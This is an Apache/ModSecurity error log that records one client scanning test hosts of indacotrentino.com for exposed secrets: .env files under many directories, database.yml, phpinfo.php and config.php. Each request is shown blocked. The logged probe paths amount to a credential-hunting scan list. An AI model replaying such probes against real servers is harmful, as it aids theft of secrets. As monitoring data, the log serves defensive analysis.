[Thu Jan 01 09:26:24.439712 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.439967 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.440165 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.521053 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.521292 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.521474 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.602268 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.602542 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.602718 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_3wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.683136 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.683388 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.683592 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.764368 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.764606 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.764766 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.845288 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.845527 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.845706 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.926380 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.926627 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:24.926786 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aVYvsHNXDBI5CgrqjG-_4wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.007478 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.007727 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.007921 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5AAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.088451 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.088694 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.088885 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5QAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.169241 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.169476 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.169646 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5gAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.250196 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.250453 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:25.250626 2026] [:error] [pid 1117412] [client 54.75.202.236:53972] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aVYvsXNXDBI5CgrqjG-_5wAAAAQ"], referer: https://www.google.com/
[Thu Jan 01 09:26:27.542225 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php, referer: https://www.google.com/
[Thu Jan 01 09:26:27.624796 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/info.php, referer: https://www.google.com/
[Thu Jan 01 09:26:27.707166 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/php.php, referer: https://www.google.com/
[Thu Jan 01 09:26:29.294872 2026] [authz_core:error] [pid 1117460] [client 54.75.202.236:53982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.php, referer: https://www.google.com/
[Thu Jan 01 09:26:30.214028 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG9wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.214257 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG9wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.214446 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG9wAAAAc"], referer: https://www.google.com/
[Thu Jan 01 09:26:30.297081 2026] [:error] [pid 1117460] [client 54.75.202.236:53982] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /db/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db/database.yml"] [unique_id "aVYvtiEFf7TT1LdjoKPG-AAAAAc"], referer: https://www.google.com/
